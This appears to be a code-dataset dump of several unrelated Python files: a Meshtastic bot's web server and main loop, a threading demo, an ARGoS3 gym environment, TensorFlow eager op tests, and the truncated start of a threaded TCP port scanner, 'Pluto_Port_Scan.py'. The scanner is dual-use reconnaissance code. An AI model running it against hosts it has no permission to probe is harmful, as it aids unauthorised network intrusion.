latitude = position.get('latitude')
longitude = position.get('longitude')
if not (latitude and longitude):
continue
user = node_info.get('user', {})
hw_model = user.get('hwModel', 'unknown')
snr = node_info.get('snr', 10.0)
# No signal info, use default MAX (10.0)
if snr is None:
snr = 10.0
last_heard = int(node_info.get('lastHeard', 0))
last_heard_dt = datetime.fromtimestamp(last_heard)
battery_level = position.get('batteryLevel', 100)
altitude = position.get('altitude', 0)
# tail filter
diff = datetime.fromtimestamp(time.time()) - last_heard_dt
if diff > timedelta(seconds=tail_value):
continue
# name filter
if len(name) > 0 and user.get('longName') != name:
continue
#
nodes.append([user.get('longName'), str(round(latitude, 5)),
str(round(longitude, 5)), self.format_hw(hw_model), snr,
last_heard_dt.strftime("%d/%m/%Y, %H:%M:%S"),
battery_level,
altitude,
])
return jsonify(nodes)
class WebApp: # pylint:disable=too-few-public-methods
"""
WebApp: web application container
"""
def __init__(self, app: Flask, config: Config, meshtastic_connection: MeshtasticConnection, logger: logging.Logger):
self.app = app
self.config = config
self.logger = logger
self.meshtastic_connection = meshtastic_connection
def register(self) -> None:
"""
Register Flask routes
:return:
"""
self.app.add_url_rule('/script.js', view_func=RenderScript.as_view(
'script_page', config=self.config))
self.app.add_url_rule('/data.json', view_func=RenderDataView.as_view(
'data_page', config=self.config, meshtastic_connection=self.meshtastic_connection, logger=self.logger))
# Index pages
self.app.add_url_rule('/', view_func=RenderTemplateView.as_view(
'root_page', template_name='index.html'))
self.app.add_url_rule('/index.htm', view_func=RenderTemplateView.as_view(
'index_page', template_name='index.html'))
self.app.add_url_rule('/index.html', view_func=RenderTemplateView.as_view(
'index_html_page', template_name='index.html'))
class ServerThread(Thread):
"""
Web application server thread
"""
def __init__(self, app: Flask, config: Config, logger: logging.Logger):
Thread.__init__(self)
self.config = config
self.logger = logger
self.server = make_server('', self.config.enforce_type(int, self.config.WebApp.Port), app)
self.ctx = app.app_context()
self.ctx.push()
def run(self) -> None:
"""
:return:
"""
self.logger.info('starting server')
self.server.serve_forever()
def shutdown(self) -> None:
"""
:return:
"""
self.server.shutdown()
class WebServer: # pylint:disable=too-few-public-methods
"""
Web server wrapper around Flask app
"""
def __init__(self, config: Config, meshtastic_connection: MeshtasticConnection, logger: logging.Logger):
self.meshtastic_connection = meshtastic_connection
self.config = config
self.logger = logger
self.app = Flask(__name__)
self.server = None
def run(self) -> None:
"""
Run web server
:return:
"""
if self.config.enforce_type(bool, self.config.WebApp.Enabled):
web_app = WebApp(self.app, self.config, self.meshtastic_connection, self.logger)
web_app.register()
self.server = ServerThread(self.app, self.config, self.logger)
self.server.start()
def shutdown(self) -> None:
"""
Web server shutdown method
:return:
"""
self.server.shutdown()
def main():
"""
Main function :)
:return:
"""
config = Config()
config.read()
level = logging.INFO
if config.enforce_type(bool, config.DEFAULT.Debug):
level = logging.DEBUG
set_sql_debug(True)
# our logger
logger = setup_logger('mesh', level)
# meshtastic logger
logging.basicConfig(level=level,
format=LOGFORMAT)
#
telegram_connection = TelegramConnection(config.Telegram.Token, logger)
meshtastic_connection = MeshtasticConnection(config.Meshtastic.Device, logger)
meshtastic_connection.connect()
database = MeshtasticDB(config.Meshtastic.DatabaseFile, meshtastic_connection, logger)
#
aprs_streamer = APRSStreamer(config)
call_sign_filter = CallSignFilter(database, config, meshtastic_connection, logger)
aprs_streamer.set_filter(call_sign_filter)
aprs_streamer.set_logger(logger)
#
telegram_bot = TelegramBot(config, meshtastic_connection, telegram_connection)
telegram_filter = TelegramFilter(database, config, meshtastic_connection, logger)
telegram_bot.set_filter(telegram_filter)
telegram_bot.set_logger(logger)
#
meshtastic_bot = MeshtasticBot(database, config, meshtastic_connection, telegram_connection)
meshtastic_filter = MeshtasticFilter(database, config, meshtastic_connection, logger)
meshtastic_bot.set_filter(meshtastic_filter)
meshtastic_bot.set_logger(logger)
meshtastic_bot.subscribe()
#
web_server = WebServer(config, meshtastic_connection, logger)
# non-blocking
aprs_streamer.run()
web_server.run()
telegram_bot.run()
# blocking
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
web_server.shutdown()
logger.info('Exit requested...')
sys.exit(0)
if __name__ == '__main__':
main()
|
main.py
|
"""An of multithreading vs multiprocessing.
Adapted from https://code.tutsplus.com/articles/introduction-to-parallel-and-concurrent-programming-in-python--cms-28612
"""
import os
import time
import threading
from multiprocessing import Pool
NUM_WORKERS = 4
def non_blocking_fct(_):
"""Execute a non-blocking action.
A non-blocking action is something that doesn't require Python's attention
and can execute in the background.
"""
time.sleep(1)
def blocking_fct(_):
"""Execute a blocking action.
A blocking action is something that requires Python's attention.
"""
x = 0
while x < 10000000:
x += 1
if __name__ == '__main__':
print("Execution of non-blocking tasks")
# Run tasks serially
start_time = time.time()
for _ in range(NUM_WORKERS):
non_blocking_fct(_)
end_time = time.time()
print("Serial time={}".format(end_time - start_time))
# Run tasks using threads
start_time = time.time()
threads = [threading.Thread(target=non_blocking_fct, args=(_,)) for _ in range(NUM_WORKERS)]
[thread.start() for thread in threads]
[thread.join() for thread in threads] # Wait for everything to finish
end_time = time.time()
print("Threading time={}".format(end_time - start_time))
# Run tasks using processes
start_time = time.time()
pool = Pool(processes=4)
pool.map(non_blocking_fct, [_, _, _, _,])
end_time = time.time()
print("multiprocessing time={}".format(end_time - start_time))
print("")
print("Execution of blocking tasks")
start_time = time.time()
for _ in range(NUM_WORKERS):
blocking_fct(_)
end_time = time.time()
print("Serial time={}".format(end_time - start_time))
start_time = time.time()
threads = [threading.Thread(target=blocking_fct, args=(_,)) for _ in range(NUM_WORKERS)]
[thread.start() for thread in threads]
[thread.join() for thread in threads] # Wait for everything to finish
end_time = time.time()
print("Threading time={}".format(end_time - start_time))
start_time = time.time()
pool = Pool(processes=4)
pool.map(blocking_fct, [_, _, _, _,])
end_time = time.time()
print("multiprocessing time={}".format(end_time - start_time))
"""
Typical output:
Execution of non-blocking tasks
Serial time=4.01600003242
Threading time=1.0150001049
Multiprocessing time=1.10500001907
Execution of blocking tasks
Serial time=1.40599989891
Threading time=5.13499999046
Multiprocessing time=0.421999931335
Analysis:
For non-blocking tasks, threading and multiprocessing give similar results,
since all the waiting can be handled in the background. Multiprocessing does
perform a bit worse since there is overhead associated with spawning
additionnal processes. They both perform much faster than if the execution was
made serially though.
For blocking tasks, threading performs even worse than serial execution, because
Python jumping back and forth between threads slows down the execution.
Mutliprocessing, however, cuts down the time significantly.
"""
|
argos3_env.py
|
import threading
import socket
import subprocess
import os
import json
import sys
import platform
import shutil
import resource
import psutil
import sh
from time import sleep
import numpy as np
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import logging
logger = logging.getLogger('Argos3Env')
class Argos3Env(gym.Env):
"""A base class for environments using ARGoS3
Implements the gym.Env interface. See
https://gym.openai.com/docs
and
https://github.com/openai/gym/tree/master/gym/envs#how-to-create-new-environments-for-gym
Based on the UnityEnv class in the rl-unity repo (see github).
"""
metadata = {'render.modes': ['human']}
def __init__(self, width, height):
""" Initializes everything.
"""
self.proc = None
self.soc = None
self.connected = False
self.width = width
self.height = height
self.log_argos3 = False
self.logfile = None
self.restart = False
def setParams(self, number, min_speed, max_speed, data_type):
self.robots_num = number
self.action_dim = number
self.state_dim = number*(1+24*2+1)
self.frame_dim = 2000000000
if data_type is "numerical":
self.buffer_size = self.state_dim * 4
else:
self.buffer_size = self.frame_dim + self.state_dim
self.action_space = spaces.Box(
min_speed * np.ones(self.action_dim),
max_speed * np.ones(self.action_dim))
self.data_type = data_type;
def conf(self, loglevel='INFO', log_argos3=False, logfile=None, *args, **kwargs):
""" Configures the logger.
"""
logger.setLevel(getattr(logging, loglevel.upper()))
self.log_argos3 = log_argos3
if logfile:
self.logfile = open(logfile, 'w')
def connect(self):
""" Connects to localhost, displays the path
to the simulator binary.
"""
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = get_free_port(host)
logger.debug('Port: {}'.format(port))
assert port != 0
logger.debug(f"Platform {platform.platform()}")
pl = 'unix'
bin = sh.which('argos3')
env = os.environ.copy()
env.update(ARGOS_PORT=str(port))
env.update(DATA=self.data_type)
logger.debug(f'Simulator binary {bin}')
def stdw():
""" Takes whatever the subprocess is emiting
and pushes it to the standard output.
"""
for c in iter(lambda: self.proc.stdout.read(1), ''):
sys.stdout.write(c)
sys.stdout.flush()
def memory_usage(pid):
proc = psutil.Process(pid)
mem = proc.memory_info().rss #resident memory
for child in proc.children(recursive=True):
try:
mem += child.memory_info().rss
except psutil.NoSuchProcess:
pass
return mem
def poll():
""" Limits the memory used by the subprocess.
"""
while not self.proc.poll():
limit = 3
if memory_usage(self.proc.pid) > limit * 1024**3:
logger.warning(f'Memory usage above {limit}gb. Restarting after this episode.')
self.restart = True
sleep(5)
logger.debug(f'Unity returned with {self.proc.returncode}')
config_dir = os.path.expanduser('~/.config/argos3/plow-argos3') # which means that's where you have to put the config files
if os.path.isdir(config_dir):
shutil.rmtree(config_dir, ignore_errors=True)
def limit():
""" Limits resources used. Only limits the
address space by default.
"""
l = 6 * 1024**3 #for 3gb of address space. Works for unity so should be more than enough.
try:
# set whatever limits you want in this block
pass
except Exception as e:
print(e)
raise
"""The following configures stderr, launches a subprocess,
begins a thread and establishes a connection to the simulator.
"""
stderr = self.logfile if self.logfile else (subprocess.PIPE if self.log_argos3 else subprocess.DEVNULL)
self.proc = subprocess.Popen([bin, '-c', 'plow-argos3/argos/crossroad-fb.argos', '-e', './ddpg.log'],
env=env,
stdout=stderr,
universal_newlines=True,
preexec_fn=limit)
threading.Thread(target=poll, daemon=True).start()
#threading.Thread(target=stdw, daemon=True).start()
# wait until connection with simulator process
timeout = 20
for i in range(timeout * 10):
if self.proc.poll():
logger.debug('simulator died')
break
try:
self.soc.connect((host, port))
self.soc.settimeout(20*60) # 20 minutes
self.connected = True
logger.debug('finally connected')
break
except ConnectionRefusedError as e:
if i == timeout * 10 - 1:
print(e)
sleep(.1)
if not self.connected:
raise ConnectionRefusedError('Connection with simulator could not be established.')
def _reset(self):
if self.restart:
self.disconnect()
self.restart = False
if not self.connected:
self.connect()
state, frame = self.receive()
return state, frame
def receive(self):
""" Receive data from simulator process.
"""
data_in = b""
while len(data_in) < self.buffer_size:
chunk = self.soc.recv(min(1024, self.buffer_size - len(data_in)))
data_in += chunk
# if not looking at frames
if self.data_type is "numerical":
state = np.frombuffer(data_in, np.float32, self.state_dim, 0)
frame = None
else:
# convert frame pixels to numpy array
# 80x80 frame (6400 pixels)
bytes_per_line = 80
byte_number = bytes_per_line**2
frame = np.frombuffer(data_in, np.uint8, byte_number, 0)
bytes_per_col = byte_number/bytes_per_line
frame = np.reshape(frame, [bytes_per_line, bytes_per_col])
frame = frame[::-1, :, :3]
state = None
logger.debug("Frame received")
self.last_state = state
self.last_frame = frame
return state, frame
def send(self, action, reset=False):
""" Send action to execute through socket.
"""
a = np.concatenate((action, [1. if reset else 0.]))
a = np.array(a, dtype=np.float32)
assert a.shape == (self.action_dim + 1,)
data_out = a.tobytes()
self.soc.sendall(data_out)
def disconnect(self):
""" Disconnect everything.
"""
if self.proc:
self.proc.kill()
if self.soc:
self.soc.close()
self.connected = False
def _close(self):
""" Close subprocess, socket and logfile.
"""
logger.debug('close')
if self.proc:
self.proc.kill()
if self.soc:
self.soc.close()
if self.logfile:
self.logfile.close()
def _render(self, mode='human', *args, **kwargs):
pass
def memory_usage(pid):
proc = psutil.Process(pid)
mem = proc.memory_info().rss #resident memory
for child in proc.children(recursive=True):
try:
mem += child.memory_info().rss
except psutil.NoSuchProcess:
pass
return mem
def get_free_port(host):
"""As the name indicates, get a port.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, 0))
port = sock.getsockname()[1]
sock.close()
return port
|
ops_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for operations in eager execution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import weakref
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.eager import execute
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
class OpsTest(test_util.TensorFlowTestCase):
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
@test_util.run_gpu_only
def testMatMulGPU(self):
with context.device(test_util.gpu_device_type()):
three = constant_op.constant([[3.]])
five = constant_op.constant([[5.]])
product = math_ops.matmul(three, five)
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
three = constant_op.constant(3.0)
checked_three = array_ops.check_numerics(three,
message='just checking')
self.assertEqual([[3]], checked_three.numpy())
def testExecuteFloatAttr(self):
three = constant_op.constant(3.0)
almost_three = constant_op.constant(2.8)
almost_equal = math_ops.approximate_equal(
three, almost_three, tolerance=0.3)
self.assertTrue(almost_equal)
def testExecuteIntAttr(self):
three = constant_op.constant(3)
four = constant_op.constant(4)
total = math_ops.add_n([three, four])
self.assertAllEqual(7, total)
def testExecuteBoolAttr(self):
three = constant_op.constant([[3]])
five = constant_op.constant([[5]])
product = math_ops.matmul(three, five, transpose_a=True)
self.assertAllEqual([[15]], product)
def testExecuteOneListOutput(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
x1, x2, x3 = array_ops.split(value, 3, axis=split_dim)
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testGraphMode(self):
graph = ops.Graph()
with graph.as_default(), context.graph_mode():
array_ops.placeholder(dtypes.int32)
self.assertEqual(1, len(graph.get_operations()))
# See comments on handling of int32 tensors on GPU in
# EagerTensor.__init__.
@test_util.run_gpu_only
def testInt32CPUDefault(self):
with context.device('/gpu:0'):
r = constant_op.constant(1) + constant_op.constant(2)
self.assertAllEqual(r, 3)
def testExecuteListOutputLen1(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
result = array_ops.split(value, 1, axis=split_dim)
self.assertTrue(isinstance(result, list))
self.assertEqual(1, len(result))
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], result[0])
def testExecuteListOutputLen0(self):
empty = constant_op.constant([], dtype=dtypes.int32)
result = array_ops.unstack(empty, 0)
self.assertTrue(isinstance(result, list))
self.assertEqual(0, len(result))
def testExecuteMultipleNonListOutput(self):
x = constant_op.constant([1, 2, 3, 4, 5, 6])
y = constant_op.constant([1, 3, 5])
result = array_ops.listdiff(x, y)
out, idx = result
self.assertTrue(out is result.out)
self.assertTrue(idx is result.idx)
self.assertAllEqual([2, 4, 6], out)
self.assertAllEqual([1, 3, 5], idx)
def testExecuteMultipleListOutput(self):
split_dim = constant_op.constant(1, dtype=dtypes.int64)
indices = constant_op.constant([[0, 2], [0, 4], [0, 5], [1, 0], [1, 1]],
dtype=dtypes.int64)
values = constant_op.constant([2, 3, 5, 7, 11])
shape = constant_op.constant([2, 7], dtype=dtypes.int64)
result = sparse_ops.gen_sparse_ops.sparse_split(
split_dim,
indices,
values,
shape,
num_split=2)
output_indices, output_values, output_shape = result
self.assertEqual(2, len(output_indices))
self.assertEqual(2, len(output_values))
self.assertEqual(2, len(output_shape))
self.assertEqual(output_indices, result.output_indices)
self.assertEqual(output_values, result.output_values)
self.assertEqual(output_shape, result.output_shape)
self.assertAllEqual([[0, 2], [1, 0], [1, 1]], output_indices[0])
self.assertAllEqual([[0, 0], [0, 1]], output_indices[1])
self.assertAllEqual([2, 7, 11], output_values[0])
self.assertAllEqual([3, 5], output_values[1])
self.assertAllEqual([2, 4], output_shape[0])
self.assertAllEqual([2, 3], output_shape[1])
# TODO(josh11b): Test an op that has multiple outputs, some but not
# all of which are lists. Examples: barrier_take_many (currently
# unsupported since it uses a type list) or sdca_optimizer (I don't
# have an example of legal inputs & outputs).
def testComposition(self):
x = constant_op.constant(1, dtype=dtypes.int32)
three_x = x + x + x
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperatorOverrides(self):
def ops_test(v1, v2):
a = constant_op.constant(v1)
b = constant_op.constant(v2)
self.assertAllEqual((-a), np.negative(v1))
self.assertAllEqual(abs(b), np.absolute(v2))
self.assertAllEqual((a + b), np.add(v1, v2))
self.assertAllEqual((a - b), np.subtract(v1, v2))
self.assertAllEqual((a * b), np.multiply(v1, v2))
self.assertAllEqual((a * a), np.multiply(v1, v1))
if all(x >= 0 for x in v2):
self.assertAllEqual((a**b), np.power(v1, v2))
self.assertAllEqual((a / b), np.true_divide(v1, v2))
self.assertAllEqual((a / a), np.true_divide(v1, v1))
self.assertAllEqual((a % b), np.mod(v1, v2))
self.assertAllEqual((a < b), np.less(v1, v2))
self.assertAllEqual((a <= b), np.less_equal(v1, v2))
self.assertAllEqual((a > b), np.greater(v1, v2))
self.assertAllEqual((a >= b), np.greater_equal(v1, v2))
# TODO(b/120678848): Remove the else branch once we enable
# ops.Tensor._USE_EQUALITY by default.
if ops.Tensor._USE_EQUALITY:
self.assertAllEqual((a == b), np.equal(v1, v2))
self.assertAllEqual((a != b), np.not_equal(v1, v2))
else:
self.assertAllEqual((a == b), np.equal(v1, v2)[0])
self.assertAllEqual((a != b), np.not_equal(v1, v2)[0])
self.assertAllEqual(v1[0], a[constant_op.constant(0)])
ops_test([1, 4, 8], [2, 3, 5])
ops_test([1, -4, -5], [-2, 3, -6])
def test_basic_slice(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :], t[:, :, :])
self.assertAllEqual(npt[::, ::, ::], t[::, ::, ::])
self.assertAllEqual(npt[::1, ::1, ::1], t[::1, ::1, ::1])
self.assertAllEqual(npt[::1, ::5, ::2], t[::1, ::5, ::2])
self.assertAllEqual(npt[::-1, :, :], t[::-1, :, :])
self.assertAllEqual(npt[:, ::-1, :], t[:, ::-1, :])
self.assertAllEqual(npt[:, :, ::-1], t[:, :, ::-1])
self.assertAllEqual(npt[-2::-1, :, ::1], t[-2::-1, :, ::1])
self.assertAllEqual(npt[-2::-1, :, ::2], t[-2::-1, :, ::2])
def testDegenerateSlices(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
# degenerate by offering a forward interval with a negative stride
self.assertAllEqual(npt[0:-1:-1, :, :], t[0:-1:-1, :, :])
# degenerate with a reverse interval with a positive stride
self.assertAllEqual(npt[-1:0, :, :], t[-1:0, :, :])
# empty interval in every dimension
self.assertAllEqual(npt[-1:0, 2:2, 2:3:-1], t[-1:0, 2:2, 2:3:-1])
def testEllipsis(self):
npt = np.array(
[[[[[1, 2], [3, 4], [5, 6]]], [[[7, 8], [9, 10], [11, 12]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[0:], t[0:])
# implicit ellipsis
self.assertAllEqual(npt[0:, ...], t[0:, ...])
# ellipsis alone
self.assertAllEqual(npt[...], t[...])
# ellipsis at end
self.assertAllEqual(npt[0:1, ...], t[0:1, ...])
# ellipsis at begin
self.assertAllEqual(npt[..., 0:1], t[..., 0:1])
# ellipsis at middle
self.assertAllEqual(npt[0:1, ..., 0:1], t[0:1, ..., 0:1])
def testShrink(self):
npt = np.array([[[[[1, 2, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]],
[[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :, :, 3], t[:, :, :, :, 3])
self.assertAllEqual(npt[..., 3], t[..., 3])
self.assertAllEqual(npt[:, 0], t[:, 0])
self.assertAllEqual(npt[:, :, 0], t[:, :, 0])
@test_util.run_gpu_only
def testOpWithInputsOnDifferentDevices(self):
# The GPU kernel for the Reshape op requires that the
# shape input be on CPU.
with context.device(test_util.gpu_device_type()):
value = constant_op.constant([1., 2.])
shape = constant_op.constant([2, 1])
reshaped = array_ops.reshape(value, shape)
self.assertAllEqual([[1], [2]], reshaped.cpu())
def testInt64(self):
# Fill requires the first input to be an int32 tensor.
self.assertAllEqual(
[1.0, 1.0],
array_ops.fill(constant_op.constant([2], dtype=dtypes.int64),
constant_op.constant(1)))
@test_util.run_gpu_only
def testOutputOnHostMemory(self):
# The Shape op kernel on GPU places the output in host memory.
with context.device(test_util.gpu_device_type()):
value = constant_op.constant([1.])
shape = array_ops.shape(value)
self.assertEqual([1], shape.numpy())
@test_util.run_gpu_only
def testSilentCopy(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
cpu_tensor = constant_op.constant(1.0)
with context.device(test_util.gpu_device_type()):
gpu_tensor = array_ops.identity(cpu_tensor)
self.assertAllEqual(cpu_tensor + gpu_tensor, 2.0)
finally:
context._set_context(old_context)
# pylint: enable=protected-access
@test_util.run_gpu_only
def testSoftPlacement(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
config.set_soft_device_placement(True)
cpu_tensor = constant_op.constant(1.0)
result = cpu_tensor + cpu_tensor
expected_device = '/job:localhost/replica:0/task:0/device:%s:0' % test_util.gpu_device_type()
self.assertEqual(result.device, expected_device)
finally:
context._set_context(old_context)
# pylint: enable=protected-access
def testRandomUniform(self):
scalar_shape = constant_op.constant([], dtype=dtypes.int32)
x = random_ops.random_uniform(scalar_shape)
self.assertEquals(0, x.shape.ndims)
self.assertEquals(dtypes.float32, x.dtype)
x = random_ops.random_uniform(
scalar_shape, minval=constant_op.constant(5.),
maxval=constant_op.constant(6.))
self.assertLess(x, 6)
self.assertGreaterEqual(x, 5)
def testArgsToMatchingEagerDefault(self):
# Uses default
ctx = context.context()
t, r = execute.args_to_matching_eager([[3, 4]], ctx, dtypes.int32)
self.assertEquals(t, dtypes.int32)
self.assertEquals(r[0].dtype, dtypes.int32)
t, r = execute.args_to_matching_eager([[3, 4]], ctx, dtypes.int64)
self.assertEquals(t, dtypes.int64)
self.assertEquals(r[0].dtype, dtypes.int64)
# Doesn't use default
t, r = execute.args_to_matching_eager(
[['string', 'arg']], ctx, dtypes.int32)
self.assertEquals(t, dtypes.string)
self.assertEquals(r[0].dtype, dtypes.string)
def testFlattenLayer(self):
flatten_layer = core.Flatten()
x = constant_op.constant([[[-10, -20], [-30, -40]], [[10, 20], [30, 40]]])
y = flatten_layer(x)
self.assertAllEqual([[-10, -20, -30, -40], [10, 20, 30, 40]], y)
def testIdentity(self):
self.assertAllEqual(2, array_ops.identity(2))
@test_util.run_gpu_only
def testIdentityOnVariable(self):
with context.device(test_util.gpu_device_name()):
v = resource_variable_ops.ResourceVariable(True)
self.assertAllEqual(True, array_ops.identity(v))
def testIncompatibleSetShape(self):
x = constant_op.constant(1)
with self.assertRaises(ValueError):
x.set_shape((1, 2))
def testCompatibleSetShape(self):
x = constant_op.constant([[1, 2]])
x.set_shape(tensor_shape.TensorShape([None, 2]))
self.assertEqual(x.get_shape(), (1, 2))
def testCastScalarToPrimitiveTypes(self):
x = constant_op.constant(1.3)
self.assertIsInstance(int(x), int)
self.assertEqual(int(x), 1)
self.assertIsInstance(float(x), float)
self.assertAllClose(float(x), 1.3)
def testCastNonScalarToPrimitiveTypesFails(self):
x = constant_op.constant([1.3, 2])
with self.assertRaises(TypeError):
int(x)
with self.assertRaises(TypeError):
float(x)
def testRange(self):
x = constant_op.constant(2)
self.assertEqual([0, 1], list(range(x)))
def testFormatString(self):
x = constant_op.constant(3.1415)
self.assertEqual('3.14', '{:.2f}'.format(x))
def testNoOpIsNone(self):
self.assertTrue(control_flow_ops.no_op() is None)
def testEagerContextPreservedAcrossThreads(self):
def init_fn():
self.assertTrue(context.executing_eagerly())
with ops.init_scope():
self.assertTrue(context.executing_eagerly())
context_switches = context.context().context_switches
self.assertEqual(len(context_switches.stack), 1)
self.assertFalse(context_switches.stack[0].is_building_function)
self.assertEqual(context_switches.stack[0].enter_context_fn,
context.eager_mode)
self.assertTrue(context.executing_eagerly())
t1 = threading.Thread(target=init_fn)
t1.start()
t1.join()
def testWeakrefEagerTensor(self):
x = constant_op.constant([[1.]])
x.at1 = constant_op.constant([[2.]])
x.at2 = 3.
weak_x = weakref.ref(x)
weak_xat1 = weakref.ref(x.at1)
del x
self.assertIs(weak_x(), None)
self.assertIs(weak_xat1(), None)
def testWeakKeyDictionaryTensor(self):
weak_key_dict = weakref.WeakKeyDictionary()
strong_x = constant_op.constant([[1.]])
strong_y = constant_op.constant([[2.]])
strong_x_ref = strong_x.experimental_ref()
strong_y_ref = strong_y.experimental_ref()
weak_key_dict[strong_x_ref] = constant_op.constant([[3.]])
weak_key_dict[strong_y_ref] = constant_op.constant([[4.]])
strong_y.a = constant_op.constant([[5.]])
weak_x_ref = weakref.ref(strong_x)
del strong_x, strong_x_ref
self.assertIs(weak_x_ref(), None)
self.assertEqual([strong_y_ref], list(weak_key_dict))
self.assertEqual(1, len(list(weak_key_dict)))
self.assertEqual(1, len(weak_key_dict))
del strong_y, strong_y_ref
self.assertEqual([], list(weak_key_dict))
def testEagerTensorsCanBeGarbageCollected(self):
x = constant_op.constant([[1.]])
y = constant_op.constant([[2.]])
x.y = y
y.x = x
weak_x = weakref.ref(x)
weak_y = weakref.ref(y)
del x
del y
gc.collect()
self.assertIs(weak_x(), None)
self.assertIs(weak_y(), None)
if __name__ == '__main__':
test.main()
|
Pluto_Port_Scan.py
|
#
#Python 3 File
#
# BSD 3-Clause License
# Copyright (c) 2019, Dominik Lothmann All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice, this list of conditions and
# the following disclaimer in the documentation and/or other materials provided with the distribution.
# Neither the name of the copyright holder nor the names of its contributors may be used to endorse or
# promote products derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
import sys
import threading
import argparse
#
#Author is Dominik Lothmann
#https://github.com/dlothmann
#Project Pluto
#
print(' _____ _ _ _____ _ _____')
print('| __ \| | | | | __ \ | | / ____|')
print('| |__) | |_ _| |_ ___ | |__) |__ _ __| |_ | (___ ___ __ _ _ __')
print('| ___/| | | | | __/ _ \ | ___/ _ \| \'__| __| \___ \ / __/ _` | \'_ \\')
print('| | | | |_| | || (_) | | | | (_) | | | |_ ____) | (_| (_| | | | |')
print('|_| |_|\__,_|\__\___/ |_| \___/|_| \__| |_____/ \___\__,_|_| |_|')
print()
print()
# Command Line Options definition
parser = argparse.ArgumentParser(description='Arguments for this programm.')
parser.add_argument('-H','--Host', metavar='', required=True, help='Host Adress you would scan')
parser.add_argument('-p1','--port1',type=int, metavar='', required=True, help='From Port. When only this is given you scan only this port.')
parser.add_argument('-p2','--port2',type=int, metavar='',help='To Port')
group = parser.add_mutually_exclusive_group()
group.add_argument('-a', '--all', action='store_true', help='Shows closed AND open Ports.')
args = parser.parse_args()
#Take Command Line Options to Variables
arg1 = args.Host
arg2 = args.port1
arg3 = args.port2
url = arg1
#Set Port1 to Port2 when only the Start Port is given.
if arg3 is None:
arg3 = arg2
#Exit when my second Port is greater than my first port
if arg3 < arg2:
print("Wrong Input. Please Check with -h")
sys.exit()
#Create the Hostname from URL or Host (arg1)
IP = socket.gethostbyname(url)
#Set the Start Port of the Scan, the end port of the scan and the max port number
startPort = arg2
endPort = arg3
maxPort = 65535
threads = []
oPorts = []
cPorts = []
#Check is port open or not and save the open or closed port in array oPorts or cPorts
def check(item):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = s.connect_ex((IP, item))
if result == 0:
oPorts.append(item)
else:
cPorts.append(item)
#Print all Open Ports
def printOpen():
print("Open Ports")
if len(oPorts) != 0:
print("|",end="")
else:
print("---",end="")
for i in oPorts:
print("{}|".format(i),end="")
print()
#Print all Closed Ports
def printClosed():
print("Closed Ports")
if len(cPorts) != 0:
